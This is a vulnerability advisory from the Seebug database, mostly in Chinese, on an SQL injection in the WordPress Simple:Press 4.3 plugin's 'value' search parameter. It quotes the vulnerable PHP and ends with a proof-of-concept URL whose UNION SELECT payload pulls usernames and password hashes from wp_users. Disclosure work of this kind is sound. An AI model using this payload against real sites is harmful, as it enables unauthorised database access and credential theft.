WordPress Simple:Press 4.3插件value参数SQL注入漏洞

2010-07-07T00:00:00
ID SSV:19912
Type seebug
Reporter Root
Modified 2010-07-07T00:00:00

Description

BUGTRAQ ID: 41348

WordPress是一款免费的论坛Blog系统。

WordPress所使用的Simple:Press插件没有正确地过滤用户在搜索字段所输入的搜索变量便注入到了SQL查询中使用:

sf-header-forum.php ---[snip]--- 385 # Add Search Vars

386 if(isset($_GET['search']))

387 {

388 if($_GET['search'] != '') $sfvars['searchpage'] = sf_esc_int($_GET['search']);

389 if(isset($_GET['value']) ? $sfvars['searchvalue'] = stripslashes(urldecode($_GET['value'])) : $sfvars['searchvalue'] = '');

390 if(isset($_GET['type']) ? $sfvars['searchtype'] = sf_esc_int($_GET['type']) : $sfvars['searchtype'] = 1);

400 if(isset($_GET['include']) ? $sfvars['searchinclude'] = sf_esc_int($_GET['include']) : $sfvars['searchinclude'] = 1);

401 if($sfvars['searchinclude'] == 0) $sfvars['searchinclude'] =1;

402 if($sfvars['searchtype'] == 0) $sfvars['searchtype'] =1;

403 } else { ---[snip]---

At the line 389, HTTP GET Request "value" defined as global variable $sfvars['searchvalue'] with filtering functions that stripslashes() and urldecode() but they can't secure it because in the sf-database.php file the global variable $sfvar['searchvalue'] inserted into sql query without any quotes/single quotes.

sf-database.php ---[snip]--- ... 401 $searchvalue=urldecode($sfvars['searchvalue']);

...

404 if($sfvars['searchtype'] == 6)

...

409 $ANDWHERE = " AND topic_status_flag=".$sfvars['searchvalue']." ";

410

411 } elseif($sfvars['searchtype'] == 8)

...

414 $userid = $sfvars['searchvalue'];

415 $SELECT = "SELECT SQL_CALC_FOUND_ROWS DISTINCT ";

416 $MATCH = "";

417 $ANDWHERE = " AND ".SFPOSTS.".user_id=".$userid." ";

418

419 } elseif($sfvars['searchtype'] == 9)

...

422 $userid = $sfvars['searchvalue']; ...

425 $ANDWHERE = " AND ".SFTOPICS.".user_id=".$userid." "; ... ---[snip]---

WordPress Simple:Press 4.3 厂商补丁:

WordPress

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://simple-press.com/

                                        
                                            
                                                http://ssvdb.com/wordpress/?page_id=4/&forum=all&value=9999+union+select+(select+concat_ws(0x3a,user_login,user_pass)+from+wp_users+LIMIT+0,1)--+&type=9&search=1&searchpage=2